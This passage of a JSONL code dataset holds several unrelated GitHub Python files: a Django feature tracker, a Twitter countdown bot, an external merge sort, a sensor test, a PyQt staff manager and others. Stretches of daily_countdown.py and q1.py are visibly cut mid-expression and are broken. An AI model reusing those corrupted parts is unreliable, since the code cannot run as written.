scores)\nplt.ylabel('Score')\nplt.xlabel('Episode #')\nplt.show()","repo_name":"puggybumper/drlnd_p2_reacher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"9490297540","text":"k = \"keyence\"\nS = input()\nnum = len(k)\nrem = len(S) - num\n\nflag = False\nif S == k:\n flag = True\n\nfor i in range(len(S)-rem):\n if S[0:i] + S[i+rem:] == k:\n flag = True\nif flag:\n print(\"YES\")\nelse:\n print(\"NO\")\n","repo_name":"lilium513/competition_programing","sub_path":"keyence/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"73828661969","text":"from django.shortcuts import render, get_object_or_404, redirect, reverse\nfrom .models import Feature, FeatureComment\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import FeatureForm, FeatureCommentForm\n\n# Create your views here.\n@login_required()\ndef all_features(request):\n all_features = Feature.objects.all()\n return render(request, \"features.html\", {'all_features':all_features} )\n\n@login_required()\ndef upvote_feature(request, id):\n \"\"\"\n A view that upvotes the selected bug\n \"\"\"\n feature = Feature.objects.get(pk=id)\n feature.upvotes += 1\n feature.save()\n return redirect(all_features)\n\n@login_required()\ndef add_feature(request):\n if request.method == \"POST\":\n submitted_form = FeatureForm(request.POST, request.FILES)\n if submitted_form.is_valid():\n submitted_form.save()\n return redirect(all_features)\n else:\n return(request,\"add_feature.html\",{\n 'form':submitted_form\n })\n else:\n toadd_form = FeatureForm()\n return render(request,\"add_feature.html\",{\n 'form' : toadd_form\n })\n\n@login_required()\ndef edit_feature(request, id):\n edit_item = get_object_or_404(Feature, pk=id)\n if request.method == \"POST\":\n submitted_form = FeatureForm(request.POST, instance=edit_item)\n if submitted_form.is_valid():\n submitted_form.save()\n return redirect(all_features)\n else:\n form = FeatureForm(instance=edit_item)\n return render(request, 'edit_feature.html',{\n 'item_form':form\n })\n\n@login_required()\ndef delete_feature(request, id):\n delete_item = get_object_or_404(Feature, pk=id)\n if request.method == \"POST\":\n delete_item.delete()\n return redirect(all_features)\n else:\n return render(request, 'confirm-delete.html',{\n 't':delete_item\n })\n\n","repo_name":"Code-Institute-Submissions/fullstack-project","sub_path":"features/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"35677369393","text":"import pytz\nfrom datetime import datetime\nimport time\nimport random\n\ndef variable_ratio_daily_countdown_tweet(api,delay_after_tweeting=0,tweet_inverse_odds=15):\n \"\"\"tweets out a daily countdown to the wellington spatial plan submission\n does so probabilistically, i.e., when run n times a day, each time it is run there is a 1/n chance it will tweet\n so as to spread the tweets right across the period.\n \"\"\"\n\n #get new zealand timezone\n nztz = pytz.timezone(\"Pacific/Auckland\")\n #get now and today\n now = datetime.now(nztz)\n today = datetime.date(now)\n\n spatial_plan_deadline = datetime.strptime(\"2020-10-05 17:00\",\"%Y-%m-%d %H:%M\")\n days_left_to_submit = (spatial_plan_deadline.date() - today).days\n\n\n # for tweets going out between 8 AM and up to 11 PM\n permitted_start_time = datetime.combine(today,datetime.strptime(\"07:59\", \"%H:%M\").time()).astimezone(nztz)\n permitted_end_time = datetime.combine(today, datetime.strptime(\"22:50\", \"%H:%M\").time()).astimezone(nztz)\n\n #determine if now is within the permitted range\n is_within_time_range = (now>permitted_start_time) & (now < permitted_end_time)\n\n #this is about 15 hours of the day so that's what we'll use\n chance_of_tweeting = 1/tweet_inverse_odds\n random.seed(datetime.now())\n lucky_hour_dip = random.random()\n print(\"lucky hour dip number is \" + str(lucky_hour_dip))\n is_lucky_hour = (lucky_hour_dip 0:\n print(\"tweeting a reminder about wellington spatial plan\")\n tweet_version = random.sample([0,1,2,3],1)[0]\n if tweet_version==0:\n tweet_text = (str(days_left_to_submit) +\n \" days left to submit for the Wellington Spatial Plan. \" +\n \"All it takes is 10 minutes for you to influence the future of Wellington.\" +\n \" Submit here: https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n elif tweet_version==1:\n tweet_text = (\n \"There are \" + str(days_left_to_submit) + \" days to get in a submission for the Wellington Spatial Plan. \" +\n \"It sets the limits for how much housing can be built in Wellington for the next THIRTY YEARS! \" +\n \"Here's the link to submit. https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n elif tweet_version==2:\n tweet_text = (\n str(days_left_to_submit) + \" sleeps left until the submission deadline for the Wellington Spatial Plan closes. \" +\n \"It takes 10 minutes of your time - if you haven't already, get your submission in now. \" +\n \"https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n elif tweet_version==3:\n tweet_text = (\n str(days_left_to_submit) + \" days left to have a say on the Wellington Spatial Plan. \" +\n \"It takes 10 minutes and determines whether Wellington housing is affordable for the next 30 years.\" +\n \" tell the council we need more housing! \" +\n \"https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n\n print(tweet_text)\n\n\n api.update_status(tweet_text)\n\n time.sleep(delay_after_tweeting)\n\n# from authenticate import *\n#\n# api = get_authenticated_api()\n#\n# for i in range(0,10):\n# variable_ratio_daily_countdown_tweet(api,1)\n\n\n\n","repo_name":"bjsmith/housingbot","sub_path":"daily_countdown.py","file_name":"daily_countdown.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"30231440176","text":"#!/usr/bin/env python3\n\nimport sys\nimport math\nimport csv\n\ncolmapping={}\ncolindexing={}\nmainmemorysize=0\nchunksize=0\nheap=[]\n\nclass Node:\n\tdef __init__(self):\n\t\t#data will be a list\n\t\tself.data=[]\n\t\tself.fp=-1\n\ndef readfile(filename):\n lines=[]\n f1=open(filename)\n lines=f1.readlines()\n f1.close()\n return lines\n\ndef readmetadata(filename):\n\tlines=readfile(filename)\n\tj=0\n\tfor i in lines:\n\t\ta,b=i.split(\",\")\n\t\tcolmapping[a]=int(b)\n\t\tcolindexing[a]=j\n\t\tj+=1\n\t\t\ndef readwordfromlines(line):\n\twords=[]\n\toffset=0\n\tfor i in colmapping.values():\n\t\twords.append(line[offset:offset+i])\n\t\toffset=offset+i+2\n\treturn words\n\ndef parseinput(cmddata):\n\tinput_file=cmddata[1]\n\toutput_file=cmddata[2]\n\tsize=int(cmddata[3])*1024*1024\n\tnthread=int(cmddata[4])\n\tcode=cmddata[5]\n\tif(code=='dsc'):\n\t\tflag=True\n\telif(code=='asc'):\n\t\tflag=False\n\telse:\n\t\tprint('PLease specify the correct sorting order')\n\t\texit()\n\tcolumns=[]\n\ti=6\n\twhile(i0):\n\t\tfilearray.append('temp'+str(findex)+'.txt')\n\t\tf2=open(filearray[findex],'w')\n\t\ttempresult=sortdata(tempresult,columns,flag)\n\t\twritelistoflist(f2,tempresult)\n\t\tf2.close()\n\t\tfindex+=1\n\tf1.close()\n\treturn filearray\n\ndef compare(l1,l2,columns,flag):\n\tif(flag):\n\t\tfor j in columns:\n\t\t\ti=colindexing[j]\n\t\t\tif(l1[i]>l2[i]):\n\t\t\t\treturn True\n\t\t\telif(l1[i]==l2[i]):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\treturn False\n\t\treturn False\n\telse:\n\t\tfor j in columns:\n\t\t\ti=colindexing[j]\n\t\t\tif(l1[i]=0):\n\t\tminheapify(i,columns,flag)\n\t\ti-=1\n\ndef adjust(pos,columns,flag):\n\tchild=pos\n\tparent=math.floor((child-1)/2)\n\n\twhile(parent>=0 and compare(heap[child].data,heap[parent].data,columns,flag)):\n\t\ttemp=heap[child]\n\t\theap[child]=heap[parent]\n\t\theap[parent]=temp\n\n\t\tchild=parent\n\t\tparent=math.floor((child-1)/2)\n\ndef removemin(columns,flag):\n\ttemp=heap[0]\n\t\n\theap[0]=heap[len(heap)-1]\n\theap.pop()\n\n\tminheapify(0,columns,flag)\n\treturn temp\n\ndef mergesplittedfiles(filearray,columns,flag):\n\n\tfilepointer=[None]*len(filearray)\n\tfor i in range(len(filearray)):\n\t\tfilepointer[i]=open(filearray[i])\n\t\tdata=readoneline(filepointer[i])\n\t\ttemp=Node()\n\t\ttemp.fp=i\n\t\ttemp.data=data\n\t\theap.append(temp)\n\n\tbuildminheap(columns,flag)\n\n\tfpwrite=open('tempoutput.txt','w')\n\tfileclosecount=0\n\n\twhile(fileclosecount!=len(filearray)):\n\t\ttemp=removemin(columns,flag)\n\t\tresult=[]\n\t\tresult.append(temp.data)\n\t\twritelistoflist(fpwrite,result)\n\n\t\tdata=readoneline(filepointer[temp.fp])\n\t\tif(len(data)!=0):\n\t\t\ttemp.data=data\n\t\t\theap.append(temp)\n\t\t\tadjust(len(heap)-1,columns,flag)\n\t\telse:\n\t\t\tfileclosecount+=1\n\n\tfor i in range(len(filearray)):\n\t\tfilepointer[i]=open(filearray[i])\n\treturn 1\n\ncmddata=sys.argv\nif(len(cmddata)<6):\n\tprint('PLease enter all parameter')\nelse:\n\tinput_file,output_file,mainmemorysize,nthread,flag,columns=parseinput(cmddata)\n\treadmetadata('metadata.txt')\n\tchunksize=calcchunksize()\n\n\tprintstats()\n\t\n\tfilearray=splitdata_sorted(input_file,columns,flag)\n\tmergesplittedfiles(filearray,columns,flag)\n","repo_name":"shanu-sh/TwoPhaseMergeSort","sub_path":"q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"30134471056","text":"import unittest\n\nfrom clib.utils import load_class, get_index_from_label\n\n\nclass LoadClassTest(unittest.TestCase):\n def setUp(self):\n self.vocfilepath = 'tests/data/voc.names'\n self.tags = {0: 'hoge', 1: 'fuga'}\n\n def test_load_class(self):\n self.assertEqual(load_class(self.vocfilepath),\n {0: 'aeroplane', 1: 'bicycle', 2: 'bird',\n 3: 'boat', 4: 'bottle', 5: 'bus', 6: 'car',\n 7: 'cat', 8: 'chair', 9: 'cow',\n 10: 'diningtable', 11: 'dog', 12: 'horse',\n 13: 'motorbike', 14: 'person',\n 15: 'pottedplant', 16: 'sheep', 17: 'sofa',\n 18: 'train', 19: 'tvmonitor'})\n\n def test_get_index(self):\n self.assertEqual(get_index_from_label(self.tags, 'fuga'), 1),\n","repo_name":"Swall0w/clib","sub_path":"tests/utils/test_load.py","file_name":"test_load.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"6766661709","text":"import functools\n\ndef memoize(func):\n cache = func.cache = {}\n @functools.wraps(func)\n def memoized_func(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = func(*args, **kwargs)\n return cache[key]\n return memoized_func\n\n@memoize\ndef sudan(n, x, y):\n if n == 0:\n return x + y\n if y == 0:\n return x\n else:\n return sudan(n - 1, sudan(n, x, y - 1), sudan(n, x, y - 1) + y)\n \nprint (sudan(2, 3, 1))\nprint (sudan(2, 4, 1))\nprint (sudan(2, 1, 2))\nprint (sudan(2, 2, 2))","repo_name":"karol95c/University","sub_path":"Python/Lab3/memoize.py","file_name":"memoize.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"3355453882","text":"import json\nimport requests\nimport os\nimport time\n\n#url='http://marketplace.envato.com/api/edge/item:10431404.json'\ntheme = open('theme_id.txt','r')\ntheme_id = theme.readlines()\ntotal_theme = theme_id.__len__()\n\nsave_to_file = open('theme_data_Apr05.txt','r+', buffering = -1)\n\ni=0\nwhile i < total_theme:\n url1 = 'http://marketplace.envato.com/api/edge/item:' + theme_id[i] + '.json'\n i += 1\n# data = requests.get(url1).text\n# data = json.loads(data)\n data = requests.get(url1).json()\n try:\n url = data ['item']['url']\n except TypeError:\n url = 'empty'\n pass\n print (url1)\n# print (url)\n themeforest = url.find('http://themeforest.net/')\n if themeforest != -1:\n item_id = data ['item']['id']\n item_name = data ['item']['item']\n user = data ['item']['user']\n sales = data ['item']['sales']\n# rating = data ['item']['rating']\n rating_decimal = data ['item']['rating_decimal']\n cost = data ['item']['cost']\n uploaded_on = data ['item']['uploaded_on']\n last_update = data ['item']['last_update']\n category = data['item']['category']\n tags = data ['item']['tags']\n string = item_id+';'+item_name+';'+user+';'+url+';'+sales+';'+cost+';'+rating_decimal+';'+uploaded_on+';'+last_update+';'+category+';'+tags+'\\n'\n string_encode = string.encode('ascii','replace')\n# print(string_encode)\n string_decode = string_encode.decode('ascii','replace')\n save_to_file.write(string_decode)\n save_to_file.flush()\n os.fsync(save_to_file.fileno())\n #time.sleep(4)\n else:\n continue\n \nprint (item_no)\n\nsave_to_file.close()\n\n","repo_name":"manojps/envato-marketplace-stats-using-api","sub_path":"envato_item_api.py","file_name":"envato_item_api.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"26522166901","text":"#filename: getip.py\n\nimport os\nimport sys\n\ndef get_ips():\n\n tmp=list()\n \n ipcsv_path=os.path.join(sys.path[0],'ip_10896_5w.csv')\n f=open(ipcsv_path,'r')\n for line in f.readlines():\n line=line.strip().split('.')\n line[0]=\".\".join(line[0:2])\n line[1]=256*int(line[2])+int(line[3])\n tmp.append(line[:2])\n tmp.sort()\n f.close\n \n return tmp\n\n#list=get_ips()\n#print list\n","repo_name":"maixiaohai/mydocuments","sub_path":"ip2region_test/getip.py","file_name":"getip.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"40351317023","text":"import time\nimport board\nimport microcontroller\nimport busio\nimport adafruit_adxl37x\nimport adafruit_bmp3xx\nimport adafruit_lis331\nimport adafruit_ms8607\n\n# Initialize I2C bus\ni2c = busio.I2C(board.IO9, board.IO8)\n\n# Check for connected I2C devices\nwhile not i2c.try_lock():\n pass\ndevices = i2c.scan()\ni2c.unlock()\n\n# Test each I2C device\nfor device in devices:\n try:\n print()\n print(\"-------------------------------------------------------\")\n print(\"Testing device at address: \", hex(device))\n if device == 0x76:\n sensor = adafruit_ms8607.MS8607(i2c)\n print(\"MS8607 P/T sensor found!\")\n print(\"Temperature: \", sensor.temperature)\n print(\"Pressure: \", sensor.pressure)\n elif device == 0x40:\n sensor = adafruit_ms8607.MS8607(i2c)\n print(\"MS8607 H sensor found!\")\n print(\"Humidity: \", sensor.relative_humidity)\n elif device == 0x77:\n sensor = adafruit_bmp3xx.BMP3XX_I2C(i2c, 0x77)\n print(\"BMP390 sensor found!\")\n print(\"Temperature: \", sensor.temperature)\n print(\"Pressure: \", sensor.pressure)\n elif device == 0x1d:\n sensor = adafruit_adxl37x.ADXL375(i2c, 0x1d)\n print(\"ADXL375 accelerometer found!\")\n print(\"Acceleration (m/s^2): X=%0.3f, Y=%0.3f, Z=%0.3f\" % sensor.acceleration)\n elif device == 0x19:\n sensor = adafruit_lis331.LIS331HH(i2c, 0x19)\n print(\"LIS331 accelerometer found!\")\n print(\"Acceleration (m/s^2): X=%0.3f, Y=%0.3f, Z=%0.3f\" % sensor.acceleration)\n else:\n raise ValueError(\"Unknown device at address: \", hex(device))\n except ValueError as ve:\n print(ve)\n except Exception as e:\n print(\"Error testing device at address \", hex(device), \": \", e)\n\n time.sleep(0.5) # Pause between sensor tests\nprint()\nprint(\"-------------------------------------------------------\")\n","repo_name":"UMBRA-Electronics/ExoBronco-Avionics","sub_path":"Software/Board_Files/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"18316962117","text":"# coding: utf-8\n# python3.5.3\n# edge_detecting.py\n\nimport cv2\n\nfrom skimage import data, segmentation\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\nparser.add_argument(\"--content\", type=str)\nparser.add_argument('--output', type=str)\n# blurred staus >>> normal=< 7\nparser.add_argument('--blurred', type=int)\nargs = parser.parse_args()\n\nglobal image, minT, maxT\n\n# Callback function for minimum threshold trackbar.\ndef adjustMinT(v):\n global minT\n minT = v\n cannyEdge()\n\n# Callback function for maximum threshold trackbar.\ndef adjustMaxT(v):\n global maxT\n maxT = v\n cannyEdge()\n\n\n###################################\n# Main program begins here. \n###################################\n\n\n# load original image as grayscale\nimage = cv2.imread(filename=args.content, flags=cv2.IMREAD_GRAYSCALE)\n\n# set up display window with trackbars for minimum and maximum threshold\n# values\n# 추후에 미세값 조정하기 위한 부분으로 현재는 미완료부분임.\ncv2.namedWindow(winname = \"edges\", flags = cv2.WINDOW_NORMAL)\n\nminT = 30\nmaxT = 150\n\n# cv2.createTrackbar() does not support named parameters\ncv2.createTrackbar(\"minT\", \"edges\", minT, 255, adjustMinT)\ncv2.createTrackbar(\"maxT\", \"edges\", maxT, 255, adjustMaxT)\n\n# Smoothing without removing edges.\ngray_filtered = cv2.bilateralFilter(image, 7, 50, 50)\n\n# minT, maxT 값을 밖으로 빼내서 조정값으로 변경해야함. 추후\nedge = cv2.Canny(image=gray_filtered, threshold1=minT, threshold2=maxT)\n\n# subtract 방식이 색상 미세조정이 가능해서 더 성능이 좋아보여, bitwise 를 대기로 함.\n# edge = cv2.bitwise_not(edge)\nedge = cv2.subtract(250, edge)\n\ncv2.imwrite(args.output, edge)","repo_name":"mrsono0/mangoPaint","sub_path":"Effects/edge_detecting.py","file_name":"edge_detecting.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"8433504073","text":"from odoo.tests import tagged\n\nfrom odoo.addons.payment_xendit.tests.common import XenditCommon\n\n\n@tagged('post_install', '-at_install')\nclass TestPaymentProvider(XenditCommon):\n def test_incompatible_with_unsupported_currencies(self):\n \"\"\" Test that Xendit providers are filtered out from compatible providers when the currency\n is not supported. \"\"\"\n compatible_providers = self.env['payment.provider']._get_compatible_providers(\n self.company_id, self.partner.id, self.amount, currency_id=self.env.ref('base.AFN').id\n )\n self.assertNotIn(self.xendit, compatible_providers)\n","repo_name":"Vauxoo/odoo","sub_path":"addons/payment_xendit/tests/test_payment_provider.py","file_name":"test_payment_provider.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"}
+{"seq_id":"12164224651","text":"#Captura de todas las excepciones sin discriminar el tipo.\n\"\"\"\nRealizar la carga de dos números por teclado e imprimir la división del primero respecto al \nsegundo. Capturar cualquier tipo de excepción que se dispare.\n\"\"\"\n\ntry:\n numero1= int(input(\"Ingrese un numero \"))\n numero2= int(input(\"Ingrese un nuevo numero \"))\n division = numero1 / numero2\n print(\"La division de ambos numeros es \", division)\nexcept:\n print(\"Problemas con la entrada de valores o en la operacion\")","repo_name":"SaraEOlivera/Ejercicios-Python","sub_path":"Python Github/Biblioteca - POO/58. Manejo de excepciones.py","file_name":"58. Manejo de excepciones.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"70115498450","text":"class Solution:\n def minWindow(self, s: str, t: str) -> str:\n \n if t == \"\": return \"\"\n\n countT, countS = {}, {}\n\n for char in t:\n countT[char] = 1 + countT.get(char,0)\n\n res, resLen = (-1,-1), float('inf')\n\n have, need = 0, len(countT)\n\n left = 0\n\n for right in range(len(s)):\n curr = s[right]\n countS[curr] = 1 + countS.get(curr,0)\n\n if curr in countT and countS[curr] == countT[curr]:\n have += 1\n \n while have == need:\n if resLen > (right - left + 1):\n res = (left,right)\n resLen = (right - left + 1)\n \n leftChar = s[left]\n countS[leftChar] -= 1\n\n if leftChar in countT and countS[leftChar] < countT[leftChar]:\n have -= 1\n \n left += 1\n left,right = res\n\n return s[left:right+1] if resLen != float('inf') else \"\"\n\n\n","repo_name":"karan-mudaliar/LeetCode","sub_path":"0076-minimum-window-substring/0076-minimum-window-substring.py","file_name":"0076-minimum-window-substring.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"18176428451","text":"# TODO: добавить поиск по имени/фамилии/логину/id добаить комбобокс и поле ввода\n\nimport sqlite3\nimport sys\n\nfrom PyQt5.QtWidgets import QWidget, QApplication, QTableWidgetItem, QHeaderView, QMessageBox\n\nimport modules.account\nimport modules.login\nimport modules.search\nimport modules.addDialog\nimport modules.changeDialog\nfrom templates.control_employees import Ui_Control\n\n\nclass Control(QWidget, Ui_Control):\n def __init__(self, login, passwd):\n super().__init__()\n self.setupUi(self)\n self.con = sqlite3.connect('management.db')\n\n self.account = modules.account.Account(login, passwd)\n cur = self.con.cursor()\n self.importance = cur.execute(f\"SELECT importance FROM positions \"\n f\"WHERE position = '{self.account.get_position()}'\").fetchone()[0]\n self.importances = [i[0] for i in cur.execute(\"SELECT importance FROM positions\").fetchall()]\n cur.close()\n\n self.fill_work_table()\n self.config()\n self.fill_filter_cb()\n\n self.newWorkerBtn.clicked.connect(self.add_employee)\n self.setWorkerBtn.clicked.connect(self.update_employee)\n self.deleteWorkerBtn.clicked.connect(self.delete_employee)\n self.filterEdit.textChanged.connect(self.fill_work_table_filter)\n\n def fill_work_table(self):\n sql = \"SELECT * FROM workers\"\n\n cur = self.con.cursor()\n data = cur.execute(sql).fetchall()\n headers = cur.description\n headers = [headers[i][0] for i in range(len(headers))]\n cur.close()\n\n if self.importance != max(self.importances):\n self.outputWorkers.setColumnCount(len(data[0]) - 2)\n else:\n self.outputWorkers.setColumnCount(len(data[0]))\n self.outputWorkers.setHorizontalHeaderLabels(headers)\n header = self.outputWorkers.horizontalHeader()\n header.setSectionResizeMode(0, QHeaderView.Stretch)\n self.outputWorkers.setRowCount(0)\n\n for i, row in enumerate(data):\n self.outputWorkers.setRowCount(self.outputWorkers.rowCount() + 1)\n for j, elem in enumerate(row):\n self.outputWorkers.setItem(i, j, QTableWidgetItem(str(elem)))\n\n \"\"\"==================ФИЛЬТРАЦИЯ-НАЧАЛО========================\"\"\"\n\n def fill_filter_cb(self):\n if self.importance == max(self.importances):\n self.filterBox.addItems(['Имя', \"Фамилия\", \"Логин\", \"ID\"])\n else:\n self.filterBox.addItems(['Имя', \"Фамилия\", \"ID\"])\n\n def fill_work_table_filter(self):\n if not self.filterEdit.text():\n self.fill_work_table()\n result = modules.search.search(self.filterBox.currentText(), self.filterEdit.text())\n if not result:\n return\n data = result[0]\n self.outputWorkers.clear()\n self.outputWorkers.setRowCount(0)\n\n for i, row in enumerate(data):\n self.outputWorkers.setRowCount(self.outputWorkers.rowCount() + 1)\n for j, elem in enumerate(row):\n self.outputWorkers.setItem(i, j, QTableWidgetItem(str(elem)))\n\n \"\"\"==================ФИЛЬТРАЦИЯ-КОНЕЦ========================\"\"\"\n\n \"\"\"=============НАСТРОЙКА НАЧАЛО============\"\"\"\n def config(self):\n if self.importance == 2:\n self.newWorkerBtn.setEnabled(False)\n self.setWorkerBtn.setEnabled(False)\n self.deleteWorkerBtn.setEnabled(False)\n elif self.importance == max(self.importances):\n import modules.positions\n\n self.tabs.addTab(modules.positions.Positions(), 'Должности')\n else:\n self.setWorkerBtn.setEnabled(False)\n \"\"\"=============НАСТРОЙКА КОНЕЦ============\"\"\"\n\n \"\"\"=============УПРАВЛЕНИЕ СОТРУДНИКАМИ НАЧАЛО============\"\"\"\n\n def add_employee(self):\n dlg = modules.addDialog.AddDialog(self.outputWorkers.selectedItems(), self.outputWorkers, self.account)\n dlg.exec()\n if dlg.result():\n self.fill_work_table()\n\n def update_employee(self):\n dlg = modules.changeDialog.ChangeDialog(self.outputWorkers.selectedItems(), self.outputWorkers, self.account)\n dlg.exec()\n if dlg.result():\n self.fill_work_table()\n\n def delete_employee(self):\n try:\n elem = self.outputWorkers.selectedItems()[0]\n idd = self.outputWorkers.item(elem.row(), 0).text()\n except IndexError:\n return\n\n cur = self.con.cursor()\n login = cur.execute(f\"SELECT login FROM workers WHERE id = {idd}\").fetchone()[0]\n cur.close()\n\n if login == self.account.get_login():\n QMessageBox.about(self, 'Ошибка', 'Вы не можете удалить самого себя!')\n return\n\n cur = self.con.cursor()\n elem_importance = cur.execute(\n f\"SELECT importance FROM positions WHERE position = '{self.outputWorkers.item(elem.row(), 6).text()}'\").fetchone()[\n 0]\n cur.close()\n if self.importance < elem_importance:\n QMessageBox.about(self, 'Ошибка', 'Вы не можете удалить сотрудника, превосходящего вас по должности!')\n return\n\n valid = QMessageBox.question(self, 'Удаление', f\"Действительно удалить сотрудника с id {str(idd)}?\",\n QMessageBox.Yes, QMessageBox.No)\n\n if valid == QMessageBox.Yes:\n cur = self.con.cursor()\n cur.execute(f\"DELETE FROM workers WHERE id IN ({str(idd)})\")\n cur.close()\n self.con.commit()\n self.fill_work_table()\n\n \"\"\"=============УПРАВЛЕНИЕ СОТРУДНИКАМИ КОНЕЦ============\"\"\"\n\n\ndef exception_hook(cls, exception, traceback):\n sys.__excepthook__(cls, exception, traceback)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = modules.login.Login()\n ex.show()\n sys.excepthook = exception_hook\n sys.exit(app.exec_())\n","repo_name":"hatedestiny6/projectYandex","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6237,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"}
+{"seq_id":"28218507873","text":"import mahotas\n\nclass ZernikeMoments:\n \n def __init__(self, radius):\n # store the size of the radius that will be used when computing moments\n self.radius = radius\n\n def describe(self, image):\n # return the Zerinke moments for the image\n return mahotas.features.zernike_moments(image, self.radius)\n\n# indexing pokemon sprites\n\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nimport cv2\n\n# construct argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-s\", \"--sprites\", required = True,\n help = \"Path where the sprites will be stored\")\nap.add_argument(\"-i\", \"--index\", required = True,\n help = \"Path where the index file will be stored\")\nargs = vars(ap.parse_args())\n\n# intialize our descriptor (Zerinke Moments with a radius of 21\n# used to characterize the shape of our pokemon) and our index dictionary\ndesc = ZernikeMoments(21)\nindex = {}\n\n# loop over the sprite images\nfor spritePath in glob.glob(args[\"sprites\"] + \"/*.png\"):\n \n # parse ot the pokemon name, then load the image and convert to grayscale\n pokemon = spritePath[spritePath.rfind(\"/\") + 1:].replace(\".png\", \"\")\n image = cv2.imread(spritePath)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # pad the image with extra white pixels to ensure the edges of the \n # pokemon are not up against the borders of the image\n image = cv2.copyMakeBorder(image, 15,15,15,15, cv2.BORDER_CONSTANT, value = 255)\n\n # invert + threshold image\n # the inversion takes place so the foreground is white\n thresh = cv2.bitwise_not(image)\n thresh[thresh > 0] = 255\n\n # intialize the outline image, find the outermost\n # contours (outline) of the pokemon, the draw it\n outline = np.zeros(image.shape, dtype = \"uint8\")\n (_, cnts, _) = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, \n cv2.CHAIN_APPROX_SIMPLE)\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[0]\n cv2.drawContours(outline, [cnts],-1,255,-1)\n\n # compute Zernike moments to characterize the shape of pokemon outline\n # the update index\n moments = desc.describe(outline)\n index[pokemon] = moments\n\n# write index to file\nwith open(args[\"index\"], 'wb') as f:\n pickle.dump(index, f)\n\n","repo_name":"AdamBioprinter/OpenCV-Python-Tutorials","sub_path":"opencv/pyimagesearchTuts/Pokedex2.py","file_name":"Pokedex2.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"19243559522","text":"from my_city.views import CityNewsViewSet\nfrom rest_framework.routers import SimpleRouter\n\n\nclass OptionalSlashRouter(SimpleRouter):\n\n def __init__(self):\n self.trailing_slash = '/?'\n super(SimpleRouter, self).__init__()\n\n\nrouter = OptionalSlashRouter()\nrouter.register(r'my_city', CityNewsViewSet)\nurlpatterns = router.urls\n","repo_name":"AltynbekPirman/soAktau","sub_path":"backend/src/my_city/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"29513116031","text":"# square and multiply modular expoentiation\nfrom traditional_extended_eudlidean import polynomial\nP = polynomial()\n\n\n# suppose p is the characteristic of the field F_p\ndef square_and_multiply(f, g, m, p):\n [_, temp] = P.div(f, g, p)\n result = [1]\n while m != 0:\n m, flag = m / 2, m % 2\n if flag == 1:\n [_, result] = P.div(P.mul(temp, result, p), g, p)\n [_, temp] = P.div(P.mul(temp, temp, p), g, p)\n return result\n","repo_name":"JenTus/AdvancedAlgorithm","sub_path":"square_and_multiply.py","file_name":"square_and_multiply.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
